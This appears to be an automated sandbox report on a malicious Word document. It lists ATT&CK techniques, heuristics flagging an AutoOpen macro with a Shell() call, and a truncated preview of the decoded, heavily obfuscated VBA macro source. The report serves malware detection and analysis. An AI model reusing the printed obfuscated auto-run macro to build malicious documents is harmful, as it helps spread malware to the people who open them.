Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection also confirms its malicious nature.
Heuristics (7)

- ClamAV: Doc.Macro.Obfuscation-6331107-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.Obfuscation-6331107-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 81460 bytes |

SHA-256: 701d05bd7a119284f0fe6385008440231624518c647c4a75c6ee20d22ecbe1da

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BfHZCs"
Sub AutoOpen()
    uAQtaWmBy = -614 + 636
    Select Case uAQtaWmBy
        Case 9810 / 1635
            jPjhTZgnA = 168
        Case 495 - 476
            uZ62IkbG = True
        Case 47 + 7
            uT0s7 = True
        Case Else
            pb3RcK = 168
    End Select
    KnMjP = -614 + 636
    Select Case KnMjP
        Case 9810 / 1635
            lQxynO = 34094.395339746
        Case 495 - 476
            m92MkeSq = True
    End Select
    vQogye = 187 + 80
    If vQogye = 9810 / 1635 Then
        RksGDv = FH6D08lJs
    Else
        fkpRq = 34199.26947475
    End If
    rV3cM = RksGDv & fkpRq
    KrdR9JU = 19110 / 455
    Select Case KrdR9JU
        Case 10145 - 10142
            ExGHD = True
        Case -740 + 771
            zBaSd4eWj = 27778
        Case 670 - 630
            w7XpF = 96
        Case Else
            Z9NOuSZl = 60228.635483252
    End Select
    i1LJfPT = 19110 / 455
    Select Case i1LJfPT
        Case 10145 - 10142
            T6DUbd1 = 48883.568023761
        Case -740 + 771
            kY7NR = 48883.568023761
        Case 670 - 630
            u9WXRC = 255
        Case Else
            DKDyY3RI = iGFsaT
    End Select
    YeR5U = 19110 / 455
    Select Case YeR5U
        Case 10145 - 10142
            wLIhT64 = 6842
        Case -740 + 771
            XpzGmo = 42881.492484296
        Case 670 - 630
            sibNl = 36
    End Select
    Plq8RoV7j = 121 - 49
    Select Case Plq8RoV7j
        Case -3169 + 3172
            ITn8lLOQA = -356693444
        Case 25978 / 838
            dhSfz = -27741
        Case -627 + 662
            b4RZH = True
    End Select
    iNXRl = 121 - 49
    Select Case iNXRl
        Case -3169 + 3172
            rRClidUO = 130
    End Select
    Ow3VTF9M = 121 - 49
    Select Case Ow3VTF9M
        Case -3169 + 3172
            YOPCL1BAZ = 42064.041526093
        Case 25978 / 838
            l6UyW7bR = 48755.761437766
        Case -627 + 662
            ydKgD = 74
    End Select
    jw7UyW = 8 + 71
    Select Case jw7UyW
        Case -2808 + 2810
            USgqB8s = False
    End Select
    GO4WCu1 = 742 + 22
    If GO4WCu1 = -2808 + 2810 Then
        jewZI1jlN = 26446
    End If
    cJh97By = cJh97By & jewZI1jlN
    weLMKtIER = 8 + 71
    Select Case weLMKtIER
        Case -2808 + 2810
            yVQMLYTp0 = 170
        Case -784 + 800
            amRY2JX = 170
    End Select
    L94gJQP = 742 + 22
    If L94gJQP = -2808 + 2810 Then
        ueOG6Eb3 = -1694749206
    End If
    kMjp6 = kMjp6 & ueOG6Eb3
    USiqsDwl = 8 + 71
    Select Case USiqsDwl
        Case -2808 + 2810
            vinaej = 18560.181849477
        Case -784 + 800
            ncOBj0 = False
        Case 259 - 204
            Ie26PiM = 5582.1076778674
        Case Else
            BIpb94y = N3xDpQ
    End Select
    B3a597krJ = 256 - 136
    Select Case B3a597krJ
        Case -768 + 782
            DnXfNGbV = True
        Case 12863 / 677
            yboTcIYg = pONyg9aZ
        Case 1 + 50
            tY4Tc = 13370
        Case Else
            jj7XZdcOF = 32984.985876926
    End Select
    Q6QcSChto = 583 + 16
    If Q6QcSChto = -768 + 782 Then
        ulwxK = 0
    ElseIf Q6QcSChto = 12863 / 677 Then
        IGbiSrLTa = 21138.122868529
    Else
        evhfIWpx = 8819
    End If
    DMQvtuHxc = ulwxK & IGbiSrLTa & evhfIWpx
    ZQmOdK = 256 - 136
    Select Case ZQmOdK
        Case -768 + 782
            VuXzI = True
    End Select
    MT7496 = 256 - 136
    Select Case MT7496
        Case -768 + 782
            eRrfYt = 238
        Case 12863 / 677
            kGjue7DY = 238
        Case 1 + 50
            ucMxeF = 1231.5808959735
        Case Else
            qmxTdn = 61321.781155712
    End Select
    s19n4L = 21 + 78
    Select Case s19n4L
        Case 2177 - 2165
            kuvBG9 = -362286442
        Case 27 - 5
            WEkbVqf = -362286442
        Case 14792 / 344
            BnPT9p = 22744
    End Select
    b24UtF = 1023 * 1
    If b24UtF = 2177 - 2165 Then
        xWJuCEf = 43606.160584505
    ElseIf b24UtF = 27 - 5 Then
        RntXe2q3 = 0
    Else
        uV7Wmh3BS = arh8M0
    End If
    JXMGWpm8 = xWJuCEf & RntXe2q3 & uV7Wmh3BS
    wQtExu = 21 + 78
    Select Case wQtExu
        Case 2177 - 2165
            rY1FT6P = 28922
        Case 27 - 5
            eMc3f = 22041.119276654
        Case 14792 / 344
            mZO8CPR = CpMS5Puy
        Case Else
            h8JkG7olh = 22041.119276654
    End Select
    FLXm27G = 969 - 6
    If FLXm27G = 2292 - 2285 Then
        qCxkB9nbw = True
    ElseIf FLXm27G = 29203 / 1007 Then
        FIy4FE = 43902.6955575
    Else
        bufEymHI = AIjLhzwrt
    End If
    U8QaR = qCxkB9nbw & FIy4FE & bufEymHI
    jPyI8 = 969 - 6
    If jPyI8 = 2292 - 2285 Then
        VsgxAwSJq = 64072.017432483
    ElseIf jPyI8 = 29203 / 1007 Then
        fjiUEv = 64072.017432483
    Else
        qjI3a = DzGMsecW
    End If
    zwzgjAe = VsgxAwSJq & fjiUEv & qjI3a
    wIVFqrW = 969 - 6
    If wIVFqrW = 2292 - 2285 Then
        BTdO7 = -270
    ElseI ... (truncated)
```